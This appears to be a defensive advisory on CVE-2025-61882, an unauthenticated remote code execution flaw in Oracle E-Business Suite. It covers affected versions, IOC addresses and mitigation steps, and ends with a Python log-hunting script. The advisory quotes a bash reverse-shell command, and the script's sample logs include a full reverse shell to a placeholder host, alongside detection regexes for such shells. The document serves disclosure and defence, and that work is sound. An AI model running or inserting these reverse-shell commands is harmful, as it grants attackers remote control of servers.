
A critical security vulnerability has been disclosed in the widely used Oracle E-Business Suite (EBS). Tracked as CVE-2025-61882 with a CVSS Base Score of 9.8 (Critical), this flaw affects versions 12.2.3 through 12.2.14. If successfully exploited, this exposure allows unauthenticated attackers to perform remote code execution (RCE) over a network without needing any user credentials. Given that the vulnerability is already accompanied by Indicators of Compromise (IOCs), organizations running affected versions should consider this an immediate, top-priority threat.
Summary
Vulnerability: Remote Code Execution (RCE) due to a flaw in BI Publisher Integration within Oracle Concurrent Processing.
CVE: CVE-2025-61882
Impact: Unauthenticated, remote code execution. Full compromise of the affected system and potential data loss or service disruption.
Affected Versions: Oracle E-Business Suite versions 12.2.3 through 12.2.14.
Severity: Critical, CVSS 9.8
Fix: Apply the necessary updates provided in Oracle's Security Alert. The October 2023 Critical Patch Update is a prerequisite.
How the attack works
The core of CVE-2025-61882 is a vulnerability in the BI Publisher Integration component of Oracle Concurrent Processing within EBS. The vulnerability resides in a network protocol endpoint that is accessible without authentication. An attacker can remotely exploit this weakness over a network without needing a valid username or password. This access allows the attacker to execute arbitrary code with the privileges of the affected service, leading to Remote Code Execution (RCE). Observed Indicators of Compromise (IOCs) suggest attackers are leveraging this flaw to establish outbound TCP connections, likely for a reverse shell (sh -c /bin/bash -i >& /dev/tcp// 0>&1), which grants interactive command-line access and complete control of the compromised server.
Exploitation in the wild
Oracle has released an advisory due to the severity of the threat, and associated IOCs confirm that threat actors are actively probing for and exploiting this exposure. Specific IP addresses (e.g., 200.107.207.26 and 185.181.60.11) and exploit files (referenced by SHA 256 hashes) point to active reconnaissance and execution attempts against internet-facing EBS instances. The simple, unauthenticated nature of the exploit makes automated scanning and mass exploitation trivial for cybercriminals.
What makes this so dangerous
This vulnerability combines several factors that elevate it to a top-tier security risk:
- Critical CVSS score: A CVSS score of 9.8 signifies maximum severity, indicating the exploit is highly impactful and easily accessible.
- Unauthenticated RCE: The attack requires no user credentials or interaction, meaning any internet-facing system running a vulnerable version is exposed to the threat.
- Full system compromise: Successful exploitation results in Remote Code Execution, granting the attacker complete control over the affected Oracle EBS server.
- Clear IOCs: The public existence of IOCs (including specific IP addresses and reverse shell commands) confirms this is not a theoretical threat but is being actively targeted in the wild.
Mitigation steps and best practices
There is no grace period: the flaw is already being exploited, so administrators must act immediately to secure their environments.
- Apply patches immediately: Oracle strongly recommends applying the updates provided in the Security Alert as soon as possible.
- Patch prerequisite: Ensure the October 2023 critical patch update is applied, as it is a prerequisite for the application of this Security Alert.
- Monitor for IOCs: Security teams must immediately check logs for activity associated with the provided IP addresses and look for signs of the reverse shell command to support hunting and containment.
- Restrict network access: Limit network access to the Oracle Concurrent Processing component and the BI Publisher Integration to only trusted internal networks or specific administrative hosts.
- Continuous detection: Actively monitor internet-facing assets for newly emerging, unauthenticated exposures like this one to ensure a rapid response process is in place, shortening the window of opportunity for sophisticated attackers.
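The "Monitor for IOCs" step above can be turned into a small hunting script. The following is an added example, not Oracle's advisory tooling or this page's own code: it takes the two IP addresses and the reverse-shell command fragment named above and scans log lines for exact IP matches and for the bash `/dev/tcp/` redirection pattern. The log lines and their formats (an access-log style and a process-audit style) are constructed here for illustration and are assumptions, not real captures.

```python
"""Hunt log lines for the CVE-2025-61882 IOCs named in the advisory.

Added example, not Oracle's tooling. The IP addresses and the reverse-shell
fragment come from the advisory text; every log line below is constructed
and the log formats are assumptions.
"""
import re
from typing import List, Tuple

# IOC source addresses named in the advisory. Matched exactly, never as a prefix.
IOC_IPS = {"200.107.207.26", "185.181.60.11"}

# Fragments of the reverse-shell command quoted in the advisory:
#   sh -c /bin/bash -i >& /dev/tcp/<host>/<port> 0>&1
# /dev/tcp/ is bash's built-in TCP redirection; host and port are elided in the
# advisory, so match on the path prefix and on the interactive "bash -i" flag.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"/dev/tcp/"),
    re.compile(r"\bbash\s+-i\b"),
]

# Any dotted quad in a line; lookarounds stop "200.107.207.2" from matching
# inside "200.107.207.26" and vice versa, so membership in IOC_IPS is exact.
IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")

Finding = Tuple[int, str, str]  # (line number, category, matched value)


def find_iocs(lines: List[str]) -> List[Finding]:
    """Return one finding per IOC IP hit and at most one reverse-shell hit per line."""
    findings: List[Finding] = []
    for lineno, line in enumerate(lines, 1):
        for ip in IPV4_RE.findall(line):
            if ip in IOC_IPS:
                findings.append((lineno, "ioc_ip", ip))
        for pat in REVERSE_SHELL_PATTERNS:
            if pat.search(line):
                findings.append((lineno, "reverse_shell", pat.pattern))
                break  # one reverse-shell finding per line is enough
    return findings


def summarize(findings: List[Finding]) -> dict:
    """Count findings by category, for a quick triage view."""
    counts: dict = {}
    for _, category, _ in findings:
        counts[category] = counts.get(category, 0) + 1
    return counts


# Constructed sample lines (assumed formats; paths and timestamps are made up).
SAMPLE_LOGS = [
    '10.0.0.12 - - [06/Oct/2025:09:14:02 +0000] "GET /example/login HTTP/1.1" 200 5123',
    '200.107.207.26 - - [06/Oct/2025:09:15:44 +0000] "POST /example/endpoint HTTP/1.1" 200 0',
    '200.107.207.2 - - [06/Oct/2025:09:15:50 +0000] "GET /example/ HTTP/1.1" 404 0',
    '185.181.60.11 - - [06/Oct/2025:09:16:01 +0000] "GET /example/endpoint HTTP/1.1" 200 0',
    'type=EXECVE user=applmgr cmd="sh -c /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"',
    'type=EXECVE user=applmgr cmd="sh -c ls /example/dir"',
]

if __name__ == "__main__":
    hits = find_iocs(SAMPLE_LOGS)
    for lineno, category, value in hits:
        print(f"line {lineno}: {category} -> {value}")
    print(summarize(hits))
```

Line 3 of the sample is a near-miss address that shares a prefix with an IOC; it produces no finding, which is the behaviour you want before pointing this at real access logs, where prefix matching would bury the true hits in noise.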